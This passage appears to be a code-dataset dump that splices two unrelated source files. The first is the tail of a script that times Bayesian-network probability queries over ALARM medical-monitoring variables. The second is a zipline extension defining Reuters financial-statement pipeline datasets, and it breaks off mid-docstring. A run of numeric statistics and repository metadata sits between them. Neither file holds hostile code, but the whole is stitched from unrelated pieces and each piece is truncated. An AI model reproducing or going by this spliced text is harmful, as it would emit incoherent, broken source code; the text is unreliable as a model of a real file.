(STROKEVOLUME << {'HIGH'}) & (TPR << {'LOW'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'LOW'}) & (PCWP << {'LOW'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'NORMAL'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'TRUE'}) & 
(ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'LOW'}) & (PAP << {'HIGH'}) & (PCWP << {'HIGH'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'NORMAL'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'LOW'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'LOW'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'LOW'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'HIGH'}) & (CATECHOL << {'NORMAL'}) & (CO << {'NORMAL'}) & (CVP << {'LOW'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'HIGH'}) & (PCWP << {'NORMAL'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'HIGH'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'LOW'}) & (PCWP << {'HIGH'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'HIGH'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << 
{'LOW'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'HIGH'}) & (HREKG << {'LOW'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'LOW'}) & (PAP << {'HIGH'}) & (PCWP << {'NORMAL'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'NORMAL'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'NORMAL'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'NORMAL'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'LOW'}) & (PCWP << {'HIGH'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'NORMAL'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'LOW'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'HIGH'}) & (HREKG << {'LOW'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'LOW'}) & (PCWP << {'LOW'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'NORMAL'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'HIGH'}) & (CO << {'NORMAL'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'HIGH'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'HIGH'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'HIGH'})]
# Time 100 probability queries against the model; per the summary prints
# below, the first 50 timings are averaged as single-marginal queries and
# the last 50 as all-marginal queries.
runtime = np.zeros(100)
for i in range(100):
    start_time = time.time()
    query_prob = model.prob(events[i])
    end_time = time.time()
    print("--- %s seconds ---" % (end_time - start_time))
    print(query_prob)
    runtime[i] = end_time - start_time
print("single marginal time: %s" % np.mean(runtime[0:50]))
print("all marginal time: %s" % np.mean(runtime[50:100]))
| 104.234708 | 46,112 | 0.50825 | 7,546 | 73,277 | 4.932149 | 0.021601 | 0.020071 | 0.028535 | 0.041217 | 0.931243 | 0.920442 | 0.911333 | 0.848917 | 0.838653 | 0.713794 | 0 | 0.077233 | 0.166696 | 73,277 | 702 | 46,113 | 104.383191 | 0.532279 | 0 | 0 | 0.728732 | 0 | 0.274478 | 0.465344 | 0.0409 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.024077 | 0 | 0.024077 | 0.006421 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
01adeeda9af27adb823556b047460529eaa00205 | 26,570 | py | Python | zipline_extensions/pipeline/data/fundamental.py | quantrocket-llc/zipline-extensions | f89718e44c356d62fb1b08c9044685a2bcb91718 | [
"Apache-2.0"
] | 13 | 2017-11-21T15:36:14.000Z | 2021-05-02T19:30:00.000Z | zipline_extensions/pipeline/data/fundamental.py | quantrocket-llc/zipline-extensions | f89718e44c356d62fb1b08c9044685a2bcb91718 | [
"Apache-2.0"
] | null | null | null | zipline_extensions/pipeline/data/fundamental.py | quantrocket-llc/zipline-extensions | f89718e44c356d62fb1b08c9044685a2bcb91718 | [
"Apache-2.0"
] | 5 | 2018-11-18T03:41:25.000Z | 2020-06-11T14:07:11.000Z | # Copyright 2017 QuantRocket LLC - All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from zipline.utils.numpy_utils import float64_dtype
from zipline.pipeline.data import Column, DataSet


class ReutersFinancials(DataSet):
"""
Dataset representing all available Reuters financials Chart of Account
(COA) codes. Utilizes annual fiscal periods.
Available financials:
Accounts Payable: LAPB
Accounts Receivable - Trade, Net: AACR
Accrued Expenses: LAEX
Accumulated Depreciation, Total: ADEP
Additional Paid-In Capital: QPIC
Allowance for Funds Used During Const.: NAFC
Amortization: SAMT
Amortization of Policy Acquisition Costs: EPAC
Capital Expenditures: SCEX
Capital Lease Obligations: LCLO
Cash: ACSH
Cash & Due from Banks: ACDB
Cash & Equivalents: ACAE
Cash Interest Paid: SCIP
Cash Payments: OCPD
Cash Receipts: OCRC
Cash Taxes Paid: SCTP
Cash and Short Term Investments: SCSI
Cash from Financing Activities: FTLF
Cash from Investing Activities: ITLI
Cash from Operating Activities: OTLO
Changes in Working Capital: SOCF
Common Stock, Total: SCMS
Cost of Revenue, Total: SCOR
Current Port. of LT Debt/Capital Leases: LCLD
DPS - Common Stock Primary Issue: DDPS1
Deferred Income Tax: SBDT
Deferred Policy Acquisition Costs: ADPA
Deferred Taxes: OBDT
Depreciation/Amortization: SDPR
Depreciation/Depletion: SDED
Diluted EPS Excluding ExtraOrd Items: SDBF
Diluted Net Income: SDNI
Diluted Normalized EPS: VDES
Diluted Weighted Average Shares: SDWS
Dilution Adjustment: SDAJ
ESOP Debt Guarantee: QEDG
Equity In Affiliates: CEIA
Financing Cash Flow Items: SFCF
Foreign Exchange Effects: SFEE
Fuel Expense: EFEX
Gain (Loss) on Sale of Assets: NGLA
Goodwill, Net: AGWI
Gross Profit: SGRP
Income Available to Com Excl ExtraOrd: CIAC
Income Available to Com Incl ExtraOrd: XNIC
Insurance Receivables: APRE
Intangibles, Net: AINT
Interest Exp.(Inc.),Net-Operating, Total: SINN
Interest Inc.(Exp.),Net-Non-Op., Total: SNIN
Interest Income, Bank: SIIB
Issuance (Retirement) of Debt, Net: FPRD
Issuance (Retirement) of Stock, Net: FPSS
Loan Loss Provision: ELLP
Long Term Debt: LLTD
Long Term Investments: SINV
Losses, Benefits, and Adjustments, Total: SLBA
Minority Interest: LMIN
Minority Interest: CMIN
Net Change in Cash: SNCC
Net Income: NINC
Net Income After Taxes: TIAT
Net Income Before Extra. Items: NIBX
Net Income Before Taxes: EIBT
Net Income/Starting Line: ONET
Net Interest Inc. After Loan Loss Prov.: SIAP
Net Interest Income: ENII
Net Investment Income: RNII
Net Loans: ANTL
Non-Cash Items: SNCI
Non-Interest Expense, Bank: SNIE
Non-Interest Income, Bank: SNII
Note Receivable - Long Term: ALTR
Notes Payable/Short Term Debt: LSTD
Operating Income: SOPI
Operations & Maintenance: EDOE
Other Assets, Total: SOAT
Other Bearing Liabilities, Total: SOBL
Other Current Assets, Total: SOCA
Other Current liabilities, Total: SOCL
Other Earning Assets, Total: SOEA
Other Equity, Total: SOTE
Other Investing Cash Flow Items, Total: SICF
Other Liabilities, Total: SLTL
Other Long Term Assets, Total: SOLA
Other Operating Expenses, Total: SOOE
Other Revenue, Total: SORE
Other, Net: SONT
Payable/Accrued: LPBA
Policy Liabilities: SPOL
Preferred Stock - Non Redeemable, Net: SPRS
Prepaid Expenses: APPY
Property/Plant/Equipment, Total - Gross: APTC
Property/Plant/Equipment, Total - Net: APPN
Provision for Income Taxes: TTAX
Realized & Unrealized Gains (Losses): RRGL
Redeemable Preferred Stock, Total: SRPR
Research & Development: ERAD
Retained Earnings (Accumulated Deficit): QRED
Revenue: SREV
Selling/General/Admin. Expenses, Total: SSGA
Short Term Investments: ASTI
Tangible Book Value per Share, Common Eq: STBP
Total Adjustments to Net Income: SANI
Total Assets: ATOT
Total Cash Dividends Paid: FCDP
Total Common Shares Outstanding: QTCO
Total Current Assets: ATCA
Total Current Liabilities: LTCL
Total Debt: STLD
Total Deposits: LDBT
Total Equity: QTLE
Total Extraordinary Items: STXI
Total Interest Expense: STIE
Total Inventory: AITL
Total Liabilities: LTLL
Total Liabilities & Shareholders' Equity: QTEL
Total Long Term Debt: LTTD
Total Operating Expense: ETOE
Total Preferred Shares Outstanding: QTPO
Total Premiums Earned: SPRE
Total Receivables, Net: ATRC
Total Revenue: RTLR
Total Short Term Borrowings: LSTB
Total Utility Plant, Net: SUPN
Treasury Stock - Common: QTSC
U.S. GAAP Adjustment: CGAP
Unrealized Gain (Loss): QUGL
Unusual Expense (Income): SUIE
To regenerate the column list and docstring:
>>> from quantrocket.fundamental import list_reuters_codes
>>> codes = list_reuters_codes(report_types=["financials"])
>>> attrs= "\n".join(["{0} = Column(float64_dtype) # {1}".format(k,v) for k,v in codes["financials"].items()])
>>> print(attrs)
>>> docstring = "\n".join(["{0}: {1}".format(v,k) for k,v in sorted(codes["financials"].items(), key=lambda x: x[1])])
>>> print(docstring)
"""
SCMS = Column(float64_dtype) # Common Stock, Total
VDES = Column(float64_dtype) # Diluted Normalized EPS
SDNI = Column(float64_dtype) # Diluted Net Income
SPRS = Column(float64_dtype) # Preferred Stock - Non Redeemable, Net
SOPI = Column(float64_dtype) # Operating Income
LAPB = Column(float64_dtype) # Accounts Payable
NINC = Column(float64_dtype) # Net Income
SOCL = Column(float64_dtype) # Other Current liabilities, Total
ETOE = Column(float64_dtype) # Total Operating Expense
SOLA = Column(float64_dtype) # Other Long Term Assets, Total
SREV = Column(float64_dtype) # Revenue
LAEX = Column(float64_dtype) # Accrued Expenses
XNIC = Column(float64_dtype) # Income Available to Com Incl ExtraOrd
SUIE = Column(float64_dtype) # Unusual Expense (Income)
APTC = Column(float64_dtype) # Property/Plant/Equipment, Total - Gross
SOBL = Column(float64_dtype) # Other Bearing Liabilities, Total
SNII = Column(float64_dtype) # Non-Interest Income, Bank
CEIA = Column(float64_dtype) # Equity In Affiliates
ERAD = Column(float64_dtype) # Research & Development
SDBF = Column(float64_dtype) # Diluted EPS Excluding ExtraOrd Items
SDWS = Column(float64_dtype) # Diluted Weighted Average Shares
SORE = Column(float64_dtype) # Other Revenue, Total
SCEX = Column(float64_dtype) # Capital Expenditures
ELLP = Column(float64_dtype) # Loan Loss Provision
ACSH = Column(float64_dtype) # Cash
AACR = Column(float64_dtype) # Accounts Receivable - Trade, Net
SCOR = Column(float64_dtype) # Cost of Revenue, Total
SUPN = Column(float64_dtype) # Total Utility Plant, Net
EIBT = Column(float64_dtype) # Net Income Before Taxes
AGWI = Column(float64_dtype) # Goodwill, Net
SCIP = Column(float64_dtype) # Cash Interest Paid
SDED = Column(float64_dtype) # Depreciation/Depletion
RNII = Column(float64_dtype) # Net Investment Income
ADPA = Column(float64_dtype) # Deferred Policy Acquisition Costs
SONT = Column(float64_dtype) # Other, Net
CGAP = Column(float64_dtype) # U.S. GAAP Adjustment
AINT = Column(float64_dtype) # Intangibles, Net
SGRP = Column(float64_dtype) # Gross Profit
SNIE = Column(float64_dtype) # Non-Interest Expense, Bank
EDOE = Column(float64_dtype) # Operations & Maintenance
SSGA = Column(float64_dtype) # Selling/General/Admin. Expenses, Total
SNIN = Column(float64_dtype) # Interest Inc.(Exp.),Net-Non-Op., Total
QTSC = Column(float64_dtype) # Treasury Stock - Common
OCPD = Column(float64_dtype) # Cash Payments
OBDT = Column(float64_dtype) # Deferred Taxes
TTAX = Column(float64_dtype) # Provision for Income Taxes
LPBA = Column(float64_dtype) # Payable/Accrued
QRED = Column(float64_dtype) # Retained Earnings (Accumulated Deficit)
SCSI = Column(float64_dtype) # Cash and Short Term Investments
SIAP = Column(float64_dtype) # Net Interest Inc. After Loan Loss Prov.
ANTL = Column(float64_dtype) # Net Loans
QTCO = Column(float64_dtype) # Total Common Shares Outstanding
LDBT = Column(float64_dtype) # Total Deposits
SANI = Column(float64_dtype) # Total Adjustments to Net Income
AITL = Column(float64_dtype) # Total Inventory
ATRC = Column(float64_dtype) # Total Receivables, Net
SBDT = Column(float64_dtype) # Deferred Income Tax
ASTI = Column(float64_dtype) # Short Term Investments
OTLO = Column(float64_dtype) # Cash from Operating Activities
OCRC = Column(float64_dtype) # Cash Receipts
RRGL = Column(float64_dtype) # Realized & Unrealized Gains (Losses)
STLD = Column(float64_dtype) # Total Debt
LTTD = Column(float64_dtype) # Total Long Term Debt
LTLL = Column(float64_dtype) # Total Liabilities
APPN = Column(float64_dtype) # Property/Plant/Equipment, Total - Net
SCTP = Column(float64_dtype) # Cash Taxes Paid
SLTL = Column(float64_dtype) # Other Liabilities, Total
DDPS1 = Column(float64_dtype) # DPS - Common Stock Primary Issue
SRPR = Column(float64_dtype) # Redeemable Preferred Stock, Total
ITLI = Column(float64_dtype) # Cash from Investing Activities
ONET = Column(float64_dtype) # Net Income/Starting Line
SDPR = Column(float64_dtype) # Depreciation/Amortization
STIE = Column(float64_dtype) # Total Interest Expense
APRE = Column(float64_dtype) # Insurance Receivables
SNCC = Column(float64_dtype) # Net Change in Cash
SFCF = Column(float64_dtype) # Financing Cash Flow Items
SINN = Column(float64_dtype) # Interest Exp.(Inc.),Net-Operating, Total
CMIN = Column(float64_dtype) # Minority Interest
SOAT = Column(float64_dtype) # Other Assets, Total
SNCI = Column(float64_dtype) # Non-Cash Items
LCLD = Column(float64_dtype) # Current Port. of LT Debt/Capital Leases
SDAJ = Column(float64_dtype) # Dilution Adjustment
SIIB = Column(float64_dtype) # Interest Income, Bank
QUGL = Column(float64_dtype) # Unrealized Gain (Loss)
NIBX = Column(float64_dtype) # Net Income Before Extra. Items
SOOE = Column(float64_dtype) # Other Operating Expenses, Total
SAMT = Column(float64_dtype) # Amortization
SFEE = Column(float64_dtype) # Foreign Exchange Effects
STXI = Column(float64_dtype) # Total Extraordinary Items
APPY = Column(float64_dtype) # Prepaid Expenses
EFEX = Column(float64_dtype) # Fuel Expense
QTPO = Column(float64_dtype) # Total Preferred Shares Outstanding
NGLA = Column(float64_dtype) # Gain (Loss) on Sale of Assets
SINV = Column(float64_dtype) # Long Term Investments
SOCA = Column(float64_dtype) # Other Current Assets, Total
FCDP = Column(float64_dtype) # Total Cash Dividends Paid
FPSS = Column(float64_dtype) # Issuance (Retirement) of Stock, Net
RTLR = Column(float64_dtype) # Total Revenue
ACDB = Column(float64_dtype) # Cash & Due from Banks
TIAT = Column(float64_dtype) # Net Income After Taxes
SOEA = Column(float64_dtype) # Other Earning Assets, Total
SOTE = Column(float64_dtype) # Other Equity, Total
SPOL = Column(float64_dtype) # Policy Liabilities
NAFC = Column(float64_dtype) # Allowance for Funds Used During Const.
QPIC = Column(float64_dtype) # Additional Paid-In Capital
QTLE = Column(float64_dtype) # Total Equity
ACAE = Column(float64_dtype) # Cash & Equivalents
FPRD = Column(float64_dtype) # Issuance (Retirement) of Debt, Net
ALTR = Column(float64_dtype) # Note Receivable - Long Term
SLBA = Column(float64_dtype) # Losses, Benefits, and Adjustments, Total
ATCA = Column(float64_dtype) # Total Current Assets
SOCF = Column(float64_dtype) # Changes in Working Capital
LCLO = Column(float64_dtype) # Capital Lease Obligations
LSTD = Column(float64_dtype) # Notes Payable/Short Term Debt
STBP = Column(float64_dtype) # Tangible Book Value per Share, Common Eq
SICF = Column(float64_dtype) # Other Investing Cash Flow Items, Total
ENII = Column(float64_dtype) # Net Interest Income
QTEL = Column(float64_dtype) # Total Liabilities & Shareholders' Equity
FTLF = Column(float64_dtype) # Cash from Financing Activities
LTCL = Column(float64_dtype) # Total Current Liabilities
SPRE = Column(float64_dtype) # Total Premiums Earned
LSTB = Column(float64_dtype) # Total Short Term Borrowings
EPAC = Column(float64_dtype) # Amortization of Policy Acquisition Costs
LLTD = Column(float64_dtype) # Long Term Debt
ATOT = Column(float64_dtype) # Total Assets
CIAC = Column(float64_dtype) # Income Available to Com Excl ExtraOrd
QEDG = Column(float64_dtype) # ESOP Debt Guarantee
LMIN = Column(float64_dtype) # Minority Interest
ADEP = Column(float64_dtype) # Accumulated Depreciation, Total
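
# A minimal usage sketch (editorial addition, not part of the original
# module). It assumes zipline's standard Pipeline API; the column choices
# (ATOT, NINC) and the positive-assets screen are arbitrary illustrations.
def example_fundamentals_pipeline():
    """Build a Pipeline selecting total assets and net income (illustrative)."""
    from zipline.pipeline import Pipeline  # deferred import: example only

    return Pipeline(
        columns={
            "total_assets": ReutersFinancials.ATOT.latest,
            "net_income": ReutersFinancials.NINC.latest,
        },
        # Keep only assets with a positive latest total-assets value.
        screen=ReutersFinancials.ATOT.latest > 0,
    )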


class ReutersInterimFinancials(DataSet):
"""
Dataset representing all available Reuters financials Chart of Account
(COA) codes. Utilizes interim fiscal periods.
Available financials:
Accounts Payable: LAPB
Accounts Receivable - Trade, Net: AACR
Accrued Expenses: LAEX
Accumulated Depreciation, Total: ADEP
Additional Paid-In Capital: QPIC
Allowance for Funds Used During Const.: NAFC
Amortization: SAMT
Amortization of Policy Acquisition Costs: EPAC
Capital Expenditures: SCEX
Capital Lease Obligations: LCLO
Cash: ACSH
Cash & Due from Banks: ACDB
Cash & Equivalents: ACAE
Cash Interest Paid: SCIP
Cash Payments: OCPD
Cash Receipts: OCRC
Cash Taxes Paid: SCTP
Cash and Short Term Investments: SCSI
Cash from Financing Activities: FTLF
Cash from Investing Activities: ITLI
Cash from Operating Activities: OTLO
Changes in Working Capital: SOCF
Common Stock, Total: SCMS
Cost of Revenue, Total: SCOR
Current Port. of LT Debt/Capital Leases: LCLD
DPS - Common Stock Primary Issue: DDPS1
Deferred Income Tax: SBDT
Deferred Policy Acquisition Costs: ADPA
Deferred Taxes: OBDT
Depreciation/Amortization: SDPR
Depreciation/Depletion: SDED
Diluted EPS Excluding ExtraOrd Items: SDBF
Diluted Net Income: SDNI
Diluted Normalized EPS: VDES
Diluted Weighted Average Shares: SDWS
Dilution Adjustment: SDAJ
ESOP Debt Guarantee: QEDG
Equity In Affiliates: CEIA
Financing Cash Flow Items: SFCF
Foreign Exchange Effects: SFEE
Fuel Expense: EFEX
Gain (Loss) on Sale of Assets: NGLA
Goodwill, Net: AGWI
Gross Profit: SGRP
Income Available to Com Excl ExtraOrd: CIAC
Income Available to Com Incl ExtraOrd: XNIC
Insurance Receivables: APRE
Intangibles, Net: AINT
Interest Exp.(Inc.),Net-Operating, Total: SINN
Interest Inc.(Exp.),Net-Non-Op., Total: SNIN
Interest Income, Bank: SIIB
Issuance (Retirement) of Debt, Net: FPRD
Issuance (Retirement) of Stock, Net: FPSS
Loan Loss Provision: ELLP
Long Term Debt: LLTD
Long Term Investments: SINV
Losses, Benefits, and Adjustments, Total: SLBA
Minority Interest: LMIN
Minority Interest: CMIN
Net Change in Cash: SNCC
Net Income: NINC
Net Income After Taxes: TIAT
Net Income Before Extra. Items: NIBX
Net Income Before Taxes: EIBT
Net Income/Starting Line: ONET
Net Interest Inc. After Loan Loss Prov.: SIAP
Net Interest Income: ENII
Net Investment Income: RNII
Net Loans: ANTL
Non-Cash Items: SNCI
Non-Interest Expense, Bank: SNIE
Non-Interest Income, Bank: SNII
Note Receivable - Long Term: ALTR
Notes Payable/Short Term Debt: LSTD
Operating Income: SOPI
Operations & Maintenance: EDOE
Other Assets, Total: SOAT
